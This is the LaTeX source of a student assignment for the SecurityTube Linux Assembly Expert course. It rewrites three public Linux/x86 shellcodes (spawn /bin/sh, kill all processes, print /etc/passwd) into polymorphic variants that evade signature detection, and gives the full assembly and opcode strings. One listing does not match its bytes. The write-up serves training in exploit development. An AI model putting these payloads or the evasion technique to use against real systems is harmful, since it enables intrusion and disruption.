\documentclass{article} 
\title{polymorphic Code}
\author{Marco Nappi} 
\usepackage{listings}
\usepackage{geometry}
\geometry{
	a4paper,
	total={170mm,257mm},
	left=20mm,
	top=20mm,
}
\usepackage{hyperref}
\hypersetup{
	colorlinks=true,
	linkcolor=blue,
	filecolor=magenta,
	urlcolor=blue,
}
\usepackage{graphicx}
\graphicspath{ {./images/} }
\begin{document}
\maketitle
\section*{SLAE Assignment 6}
This SLAE Assignment require to study 3 payload from shell-storm.org and to make the polymorphic version of them.
\begin{itemize}
	\item Linux/x86 - execve(/bin/sh,0,0) - 21 bytes \\ \url{http://shell-storm.org/shellcode/files/shellcode-517.php}
	\item Linux/x86 - sys\_kill(-1,9) - 11 bytes \\ \url{http://shell-storm.org/shellcode/files/shellcode-626.php}
	\item Linux/x86 - bin/cat /etc/passwd - 43 bytes \\ \url{http://shell-storm.org/shellcode/files/shellcode-571.php}
\end{itemize}
\section*{Asm code tips}
The last question before starting to write the Asm code is :\\
How to call a syscall using Asm in Linux 86 ?\\
To call a syscall we have to work with the register like so:\\\\	
$\bullet$ In EAX we put the number of the syscall\\
$\bullet$ In EBX we put the first argument of the syscall\\
$\bullet$ In ECX we put the second argument of the syscall\\
$\bullet$ In EDX we put the third argument of the syscall\\
$\bullet$ In ESI we put the fourth argument of the syscall\\
$\bullet$ In EDI we put the fifth argument of the syscall\\
\\
What happens after a call instruction ?\\
If after a call instruction there is some data those are pushed onto the stack so we use the jump-call-pop technique to push the pointer of the data on the stack 
\newpage
\section*{Linux/x86 - execve(/bin/sh,0,0) - 21 bytes}
\subsection*{Original}
\begin{lstlisting}[language={[x86masm]Assembler}]
xor ecx,ecx
mul ecx
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
mov al,0xb
int 0x80
\end{lstlisting}
\subsection*{Polymorphic Version}
\begin{lstlisting}[language={[x86masm]Assembler}]
xor ecx,ecx
mul ecx
push ecx
mov edi,0x68732f2f
push edi
mov esi,0x6e69622f
push esi
mov ebx,esp
add al,20
sub al,09
int 0x80
\end{lstlisting}
\subsection*{lesson learned}
In Red you can see the new instruction that substitutes the green one to make the shellcode polymorphic\\
\textbf{Original Shellcode:}\textbackslash 31\textbackslash c9\textbackslash f7\textbackslash e1\textbackslash 51\textbackslash 68\textbackslash 2f\textbackslash 2f\textbackslash 73\textbackslash 68\textbackslash 68\textbackslash 2f\textbackslash 62\textbackslash 69\textbackslash 6e\textbackslash 89\textbackslash e3\textbackslash b0\textbackslash 0b\textbackslash cd\textbackslash 80\\
\textbf{Polymorphic Shellcode:}\textbackslash 31\textbackslash c9\textbackslash f7\textbackslash e1\textbackslash 51\textbackslash bf\textbackslash 2f\textbackslash 2f\textbackslash 73\textbackslash 68\textbackslash 57\textbackslash be\textbackslash 2f\textbackslash 62\textbackslash 69\textbackslash 6e\textbackslash 56\textbackslash 89\textbackslash e3\textbackslash 04\textbackslash 14\textbackslash 2c\textbackslash 09\textbackslash cd\textbackslash 80\\
\textbf{Original Length:}21 bytes\\
\textbf{Polymorphic Length:}26 bytes\\
\textbf{Size Increase:}+5 bytes\\
\textbf{Percentage Increase:}23.8095\% increase\\
\includegraphics[scale=0.75]{exec}
\newpage
\section*{Linux/x86 - sys\_kill(-1,9) - 11 bytes}
\subsection*{Original}
\begin{lstlisting}[language={[x86masm]Assembler}]
xor eax,eax
mov al,0x25
push 0xffffffff
pop ebx
mov cl,0x9
int 0x80
\end{lstlisting}
\subsection*{Polymorphic Version}
\begin{lstlisting}[language={[x86masm]Assembler}]
xor ecx,ecx
mul ebx
add eax,0x25
not ebx
push 0x9
pop ecx
int 0x80
\end{lstlisting}
\subsection*{Session Learned}
In Red you can see the new instruction that substitutes the green one to make the shellcode polymorphic\\
\textbf{Original Shellcode:}\textbackslash 31\textbackslash c0\textbackslash b0\textbackslash 25\textbackslash 6a\textbackslash ff\textbackslash 5b\textbackslash b1\textbackslash 09\textbackslash cd\textbackslash 80\\
\textbf{Polymorphic Shellcode:}\textbackslash 31\textbackslash c0\textbackslash f7\textbackslash e3\textbackslash 83\textbackslash c0\textbackslash 25\textbackslash f7\textbackslash d3\textbackslash 6a\textbackslash 09\textbackslash 59\textbackslash cd\textbackslash 80\\
\textbf{Original Length:}11 bytes\\
\textbf{Polymorphic Length:}14 bytes\\
\textbf{Size Increase:}+3 bytes\\
\textbf{Percentage Increase:} 27.2727\% increase\\
\includegraphics[scale=0.75]{kill}
\newpage
\section*{Linux/x86 - bin/cat /etc/passwd - 43 bytes}
\subsection*{Original}
\begin{lstlisting}[language={[x86masm]Assembler}]
xor eax,eax  
cdq
push edx
push dword 0x7461632f
push dword 0x6e69622f
mov ebx,esp
push edx
push dword 0x64777373
push dword 0x61702f2f
push dword 0x6374652f
mov ecx,esp
mov al,0xb
push edx
push ecx
push ebx
mov ecx,esp
int 0x80
\end{lstlisting}
\subsection*{Polymorphic Version}
\begin{lstlisting}[language={[x86masm]Assembler}]
xor eax,eax
mul eax
push edx
mov edi,0x7461632f
push edi
mov esi,0x6e69622f
push esi
mov ebx,esp
push edx
mov edi,0x64777373
push edi
mov edi,0x61702f2f
push edi
mov edi,0x6374652f
push edi
mov ecx,esp
add eax,0x16
sub eax,0xb
push edx
push ecx
push ebx
mov ecx,esp
int 0x80
\end{lstlisting}
\newpage
\subsection*{Lession Learned}
In Red you can see the new instruction that substitutes the green one to make the shellcode polymorphic\\
\textbf{Original Shellcode:}"\textbackslash x31\textbackslash xc0\textbackslash x99\textbackslash x52\textbackslash x68\textbackslash x2f\textbackslash x63\textbackslash x61\textbackslash x74\textbackslash x68\textbackslash x2f\textbackslash x62\textbackslash x69\textbackslash x6e\textbackslash x89\textbackslash xe3\textbackslash x52\textbackslash x68\textbackslash x73\textbackslash x73\textbackslash x77\textbackslash x64 \textbackslash x68\textbackslash x2f\textbackslash x2f\textbackslash x70\textbackslash x61\textbackslash x68\textbackslash x2f\textbackslash x65\textbackslash x74\textbackslash x63\textbackslash x89\textbackslash xe1\textbackslash xb0\textbackslash x0b\textbackslash x52\textbackslash x51\textbackslash x53\textbackslash x89\textbackslash xe1\textbackslash xcd\textbackslash x80"\\
\textbf{Polymorphic Shellcode:}"\textbackslash x31\textbackslash xc0 \textbackslash xf7\textbackslash xe0\textbackslash x52\textbackslash xbf \textbackslash x2f \textbackslash x63\textbackslash x61\textbackslash x74\textbackslash x57\textbackslash xbe\textbackslash x2f\textbackslash x62\textbackslash x69\textbackslash x6e\textbackslash x56\textbackslash x89 \textbackslash xe3 \textbackslash x52\textbackslash xbf\textbackslash x73\textbackslash x73\textbackslash x77\textbackslash x64\textbackslash x57\textbackslash xbf\textbackslash x2f\textbackslash x2f\textbackslash x70\textbackslash x61\textbackslash x57 \textbackslash xbf\textbackslash x2f\textbackslash x65\textbackslash x74\textbackslash x63\textbackslash x57\textbackslash x89\textbackslash xe1\textbackslash x83\textbackslash xc0\textbackslash x16\textbackslash x83\\ \textbackslash xe8\textbackslash x0b\textbackslash x52\textbackslash x51\textbackslash x53\textbackslash x89\textbackslash xe1\textbackslash xcd\textbackslash x80"\\	
\textbf{Original Length:}43 bytes\\
\textbf{Polymorphic Length:}53 bytes\\
\textbf{Size Increase:}+10 bytes\\
\textbf{Percentage Increase:}23.2558\% increase \\
\includegraphics[scale=0.75]{cat}
\section*{Gitlab Repository}
Here it is the link to my SLAE repository:\\
\url{https://gitlab.com/mrcnpp/SLAE/-/tree/master/SLAE32}
\section*{References}
A good alternative to the man cmd is this site:\\
\url{https://man7.org/linux/man-pages/man2}\\
Thanks to all guys of the "Assemblers County" who helped me 
\section*{SLAE Statement}
This blog post has been	created	for	completing the requirements of the	SecurityTube Linux Assembly	Expert certification:\\
\url{http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert}\\
Student ID: SLAE-1545
\end{document}